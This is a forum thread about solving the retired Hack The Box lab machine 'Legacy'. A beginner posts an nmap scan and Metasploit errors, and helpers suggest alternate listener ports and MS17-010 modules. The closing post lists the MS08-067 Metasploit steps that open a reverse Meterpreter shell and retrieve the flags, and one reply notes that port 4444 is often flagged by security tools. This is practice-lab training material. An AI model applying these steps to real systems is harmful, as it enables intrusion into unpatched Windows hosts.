Retired Machine Legacy (Solved)

edited October 6 in Machines

Good afternoon all, I am kind of new here and I joined VIP today so I could practice on retired machines. I have gone through the forums and read all the similar posts, which have not helped me fix my problem. I am currently doing the Legacy machine and could use a little help. Here is my Nmap scan:

nmap -sC -sV -oA Legacy 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 14:15 EDT
Nmap scan report for 10.10.10.4
Host is up (0.048s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h23m27s, deviation: 2h07m16s, median: -5h53m27s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:3c:37 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|   System time: 2020-10-05T18:22:39+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

So, I see port 445 is open, so I go to Metasploit to use the ms08-067 exploit. I change RHOSTS to 10.10.10.4 and LHOST to mine (10.10.14.25) and set the target to 6, which is Windows server svcpk3. When I run the exploit I get the following error.

Started reverse TCP handler on 10.10.14.25:4444
[-] 10.10.10.4:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (10.10.10.4:445)

I have tried running both exploits with no success; any helpful nudges would be greatly appreciated.

initDr

Comments

  • @initDr said:

    Started reverse TCP handler on 10.10.14.25:4444
    [-] 10.10.10.4:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (10.10.10.4:445)

    This implies Metasploit can't see the remote system, which doesn't really make sense, as nmap obviously saw it.

    Is your issue the same as the one here: https://security.stackexchange.com/questions/73479/exploit-failed-unreachable-rexconnectiontimeout-the-connection-timed-outre ?

    If so, I'd start with trying a different port from 4444.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Yeah, very similar to that article. I've tried restarting my VM with no luck. What listening port would you recommend using, TazWake?

    initDr

  • @initDr said:

    Yeah, very similar to that article. I've tried restarting my VM with no luck. What listening port would you recommend using, TazWake?

    Try 8923 to avoid any collisions, as it's unlikely anything else will be on that. I find it always makes sense to avoid using 4444 if you can; if nothing else, it's almost always detected by security tools in real life.

    Other than that, work through all the options and see if changing any of them helps.

    show options is helpful if you aren't used to Metasploit.

    TazWake


  • Oh yeah, I almost always run show options once I pick an exploit to use. Since I don't have them all memorized, I need to know what to change, lol. :) I'll try 8923. Thanks for your help, TazWake!

    initDr

  • @initDr said:

    Yeah, very similar to that article. I've tried restarting my VM with no luck. What listening port would you recommend using, TazWake?

    Alternatively, because MS08-067 is so old, things may have changed in the internals of MSF; you could try a different SMB exploit like EternalBlue (MS17-010), which is well handled by Metasploit. (ms17_010_psexec is a good one to try.)

    TazWake


  • @TazWake said:

    Alternatively, because MS08-067 is so old, things may have changed in the internals of MSF; you could try a different SMB exploit like EternalBlue (MS17-010), which is well handled by Metasploit. (ms17_010_psexec is a good one to try.)

    MSF also has scanners for a variety of SMB attacks. If you are struggling to find one that works, I'd suggest investigating those.

    LMAY75
    Always happy to help, DM me if you need anything!

  • I'm looking into those right now, LMAY75. There are 125... so it might take a minute, lol.

    initDr

  • OK, lol, now all the ports are showing up as filtered... wtf?!?

    80/tcp filtered http
    139/tcp filtered netbios-ssn
    445/tcp filtered microsoft-ds
    8080/tcp filtered http-proxy

    Maybe I need to just walk away for a minute and collect my brains.

    initDr

  • Lmao, OK guys, it was literally a noob error. I stopped the machine and restarted it, and then my nmapping was correct again. msfconsole, use windows/smb/ms08_067_netapi, then set RHOSTS to 10.10.10.4, set LHOST to 10.10.14.25, and set target to 6 or 7 (they both work). Got in, opened a shell in Meterpreter, went to C:\Documents and Settings (Admin and John) and retrieved both the flags! ;) Thanks for the help though!

    initDr
